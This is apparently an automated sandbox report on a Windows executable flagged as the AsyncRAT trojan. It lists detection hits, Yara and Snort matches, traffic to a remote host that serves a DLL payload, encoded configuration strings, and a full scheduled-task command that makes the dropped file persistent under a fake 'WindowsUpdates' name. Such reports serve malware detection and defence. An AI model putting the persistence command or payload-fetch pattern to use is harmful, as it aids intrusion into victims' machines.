9swEoilJSdYxbHR9WvI2qw3LekrnZuLzBe8JUUcbDldrZFSUTuPiJYrDLCOQNZRG2uudymPvRqjnNDi9+3g3kzkB4AM7a2qSw+jZW6eXYGUFPeXjBanXsI0MJyNy9APnm3xi95iRqsR8iIqnKWzBqGF1E7LlsfZSn/fs9zZLgZH1CXFtpYxkWItnJdvOWA8q8RlrIZbf9Y7r5vIVwTR5pa+kGhW7Dvn24gaTp22GMRPSVXs1Ye4ztEm8MJbNNja3bUvx64A==", "Server Signature": "OHKZ7NWYl69EYIQcyC6+PGfU36n99thKqZdxN0puh4L1ETCwoOa29nJb96GrK7QKRepJZnvN+MRxczJy/Px1REeunjNO5Y//T/IyjBXZND5C8On0ON2cjRX83tRDp+Ioric9U5TtKN1Jq7L+GIGKanzfukOxSsg4f36h5IIQisCt8l9W8moK6s3BQDkx1NihC7WXyvRxf6UQsOdvhtD6fdi7h8NNBmEf0BwHbT74dNrA/9Te1MtfU1ddPlN6XT4EfFLKmKTpUGlegoneAsMRCPfpQbzmrfWmjXVMvUUg4E4HAWabE5U90mYvb+p9AcTVB+LCTlhs7KD3VtBDoKygN8IJcliOtp5FjfLKAIU6VAOi41SXMIFzGB11kVgd5fvhbJJgN7g3ZGQjesaSlXCmvzTnfyF2vPqvSnqc9KmTtZ2Cun1v4IztyqIlbYhEsSk5aa/MoOYLcVkgndI15PBP9WrrBwZqn3lgI86MOCtPPIilyL0pJLOGHvwRH7pC4AbJzmlvCyq0Foua4LyJGkDoQJsBuoPQF6I8XOlaNx4C0G+2mFZMloUlBPr/BdOawIaAU2SJldYrrCYHElg8YCpncvCfyJoo3GNuX22OdjgIaqORlg0+zv+1xcoKQIlIpcQi/puqHlRAZjEy5ZZC9GOG9dgAPYQopJKO8p/zMoDsP0g="}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXEReversingLabs: Detection: 50%
            Source: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXEVirustotal: Detection: 53%Perma Link
            Multi AV Scanner detection for submitted file
            Source: EGSh5caf8a.exeReversingLabs: Detection: 50%
            Source: EGSh5caf8a.exeVirustotal: Detection: 53%Perma Link

            Compliance

            barindex
            Uses 32bit PE files
            Source: EGSh5caf8a.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            PE / OLE file has a valid certificate
            Source: EGSh5caf8a.exeStatic PE information: certificate valid
            Contains modern PE file flags such as dynamic base (ASLR) or NX
            Source: EGSh5caf8a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 204.12.199.30:8808 -> 192.168.2.7:49710
            Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 204.12.199.30:8808 -> 192.168.2.7:49710
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 204.12.199.30 ports 20991,0,1,2,8808,9
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 20991
            Source: unknownNetwork traffic detected: HTTP traffic on port 20991 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 20991
            Source: unknownNetwork traffic detected: HTTP traffic on port 20991 -> 49709
            Yara detected Generic Downloader
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.7:49708 -> 204.12.199.30:20991
            Source: global trafficHTTP traffic detected: GET /hatthgola.vmp.dll HTTP/1.1Host: 204.12.199.30:20991Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /async.txt HTTP/1.1Host: 204.12.199.30:20991
            Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: unknownTCP traffic detected without corresponding DNS query: 204.12.199.30
            Source: global trafficHTTP traffic detected: GET /hatthgola.vmp.dll HTTP/1.1Host: 204.12.199.30:20991Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /async.txt HTTP/1.1Host: 204.12.199.30:20991
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.12.199.30:20991
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.12.199.30:20991/hatthgola.vmp.dll
            Source: Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://204.12.199.30:20991/hatthgola.vmp.dllC:
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: schtasks.exe, 00000004.00000002.1218984003.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000022.00000002.1258049891.00000000030C8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 0000003A.00000002.1281197103.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
            Source: schtasks.exe, 00000024.00000002.1260760619.0000000002A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microH
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drString found in binary or memory: https://sectigo.com/CPS0

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Source: schtasks.exeProcess created: 58

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeCode function: 0_2_027947200_2_02794720
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeCode function: 0_2_02795CB80_2_02795CB8
            Source: EGSh5caf8a.exe, 00000000.00000002.1321136441.00000000068E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamehatthgola.dll: vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1313407501.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000000.1213787103.0000000000472000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1318651208.00000000038F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exeBinary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, Settings.csBase64 encoded string: 'wHGNUQrJw6sZI3oRtxaQw+X/bkxlIdBOJbkJowQOVgLUn5pKsRLomoPD+9zIOGVA7uWdawcTz/8tpgyWiUY2hw==', 'W1HQhZv+rDlRF+jX3Pu317uw2WELfhwSFuTBxoCoz23UcrUJ3km0LVJ+CP5riqubZyvkmQCNOi294TGuN3avzQ==', 'HwkfZFmnuFq/1uAk8F0bOybnXINM9b2chuqLJJ3xEnX5PtS4e2H8Ntft1iJ/5w6lagNEN7W5HuvYpycd0KscfV71b7kFxhjqciMpaYMQYOVjzAjSRFhx2cv2esWbY8JWNNbEa5E5xn9bHHu8cxVlQNbtU2y46CK3SjeyK/gdlS0MFLgoU72UYvrnxxK2rNhAw3pGCtu//WsT0woHGDiH5RI9w5UH3L80M6NtNgVg+iA1drMctD2KWDzL2v5fJWbzdr+rGOsHMyog21VIAZGTA5BH/c5VOUSTI0eqASbU8wtMyBPHWr5tPuu7eWgknznMEi5kbge6khw5mLa79cWIk51lFUaxfWG1sfiLcwsWoaFgcwyW5CocvrwoF+Y9rdlyLUlxQW4OdCeXfP4Lis8qzEHE03PqsQbWKXaJmwg099J4VMpWn8wILV5cSy4g9NRRFf0WVAgQrFPBf/yDk2UJQwXPPb3qrsWi5+RQ2ve+Uwu3bTDNzaMDipR1RRtlRWQ5latQ+JKSmfUg+5lFSJVX2/gsih546m1F/uStTDyZKlY2cLQMmD+KgeYjfi8ZV/gxl1Bth3EVn5xeQGlqPl8zZc296Hz+ZRDNvhrV+qOCTBddvC5CgseDe9BWmW2qBoa5C0paxfRvT2lRLvWesgSYn42OcTHlqZopoFsNwbMe+vczvxTcfHaOli70MWjCV8ztkqr8WLu+7aI/oV67WnwuWhdJHhgAHHqfyQADcBySmONtibo9cHfnU67lBCH2LLMKg/M0eTofe6bZ6bxNjqEIV4dlv6nvmT0XAGxoJba68cJpYriMOJ11aVgG5twHssMCtDbVhiLMO2rSIzLMjxhBP9WVLfmoHlVeSKU+h/uVNKiDPq84ncNvAXZsQ0YddXkxaR+tkS6kblakw1U5KQz658NroQQ2NWOn239D4wqX5hTP+0UHEG3Rsjo19sXh5SOU2vKKIptIZUNY6lgK2ZdIkAr4tBrKRtOlZg4s6IQdQKXmAGAw2gd7fvuG0E875CfjfccDCly+N5MQIt8aE1JrAfYgZrJ2dHMGudMB+nLQKpVaD+fVmDDShXKxYRZLvsKljqM0GCuKy0n4ph/kwCTU5nB8Ikz3h32LmfpVRLMX18Tlf1MSbUJhXs3rFLYdDLucRFbPD6jC6ZgZE5KEtV9V28SGUxxjDbB3LYazvBbyN7ebM0812U9w9d229d2LNTS0G0j/PY3vuGGsMYNV4yP4j2d0opJXOd8N+yNVlZKn25xZ0sESIooEhbEaF5a5Uj8/JLQDLH89d7R+bDvD+N7fU7o6y6oz5oiI3+/64pE9vT2BHC0E6enIMD4yiC6ZjyqIUbXwqT3gnZXgfc214NP/j3vKQNhnzfHnBsiXgvRV/jEZugr1+Wf1LzPvbl9x1JW2x+dEFma+dkNVrgokJd0Tbp6btkGUVkLeTiqZVJpwxJL+USmkdr9i0EUNmQhf1WFcaEGzwfjx2x057KyFnh6caAzv3wMphuZyOxZXpH5TXAkMk8AhzQLgMka/g6aT1M1IPqBdG/5Cbs5X2sAv/KX+Seb4QBDpZpeA7g+07z/dF7adJQ+Ty4YgcqWxLCOkfgFaHjOW0b5z92I+nET9U9OH0Fk794Sy3zFPlpbNxGFiWj2ejO9sAYehuiqF2/Wy8W8/0efhjHGGrblAzMPrNdLbNXeZSFwEybtgK/fxZZJ6x9wUbOOdHCVz9/zNYWcctt/x2JMiZSSEveV8wKJEAmx7nIjn7BbMH0vvnuFoQXY3w9gANW+/HCH7NaxhUdrqkWkKmRfGfb+0NePy7r93UhKeMwI7JOhFcls8kVskJ3oq+qCfABs6z3vMkDxGu32yqY/ounVHScygFSIgh5cOaj5+FfTr9/2UVfDfyYYiSNCb+zmBwo61XDfA4QRBYFKSY+hXWCbHHD2xqUdEZq9gKkK8bPO3onrV4JYg1V70APijKQKtGxAy1fKC5GDoUnVAfvE8KC+cLXJcOmapt6QXEp+qPNtxBd5oOOb2QWaBwRxXFVDWNg97KYzO8If4aylKaXWsqmRXBEcik43uQmkTv0kf4HgpywL2CH399xlB0bH5HmuLoxQ4JT6S3ZEZOujas6VAoD/k8zqit5EfPLWhQwsiWsjFNT/Ll7lremKAmgRN/v1c3gLLKl5VenuisxKFXjRTiUzF2NHrg8KbNsR3dxiPQgoR/hNiTpeWPZk3tlyZhFN+6a5MwmKhl5bI8Clr0gPHnmw47oqvfL0dRgp40hFzvRvQ8eSCAcovpLf2noTts0T0iFUH4qndPRKFw75DGQccg3hdZWSH56OC24bn3SoumXiJwE2R2YVA3UzZMZpu8TU=', 'IgzMavGKijbHNGLVoeEbphOfzmQ02hNW7ZP+ZHC7NuU2dGgKpx7Odgwsq42I16/Zhaq4xke9RQ5Ch1DG7Erdsg==', 'NlJwi24pJHsEpnbRZjDIsvGCr7pNtw0ZHqF2HaAi1nb91Y1QgKhemFU/fefqd/2OZqzd1tyPhXEfvOr4eXCmKg==', 'qJeu1lxYQEVYz/pto+ElWaeYab7i98HmWSR5D1Id7g6CkOXopeGOC2Ri/vrW8h+pPCal3nkPA8YIuqmtdtobPA=='
            Source: classification engineClassification label: mal100.troj.evad.winEXE@100/3@0/1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeFile created: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdatesJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
            Source: EGSh5caf8a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: EGSh5caf8a.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: EGSh5caf8a.exeReversingLabs: Detection: 50%
            Source: EGSh5caf8a.exeVirustotal: Detection: 53%
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeFile read: C:\Users\user\Desktop\EGSh5caf8a.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\EGSh5caf8a.exe "C:\Users\user\Desktop\EGSh5caf8a.exe"
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
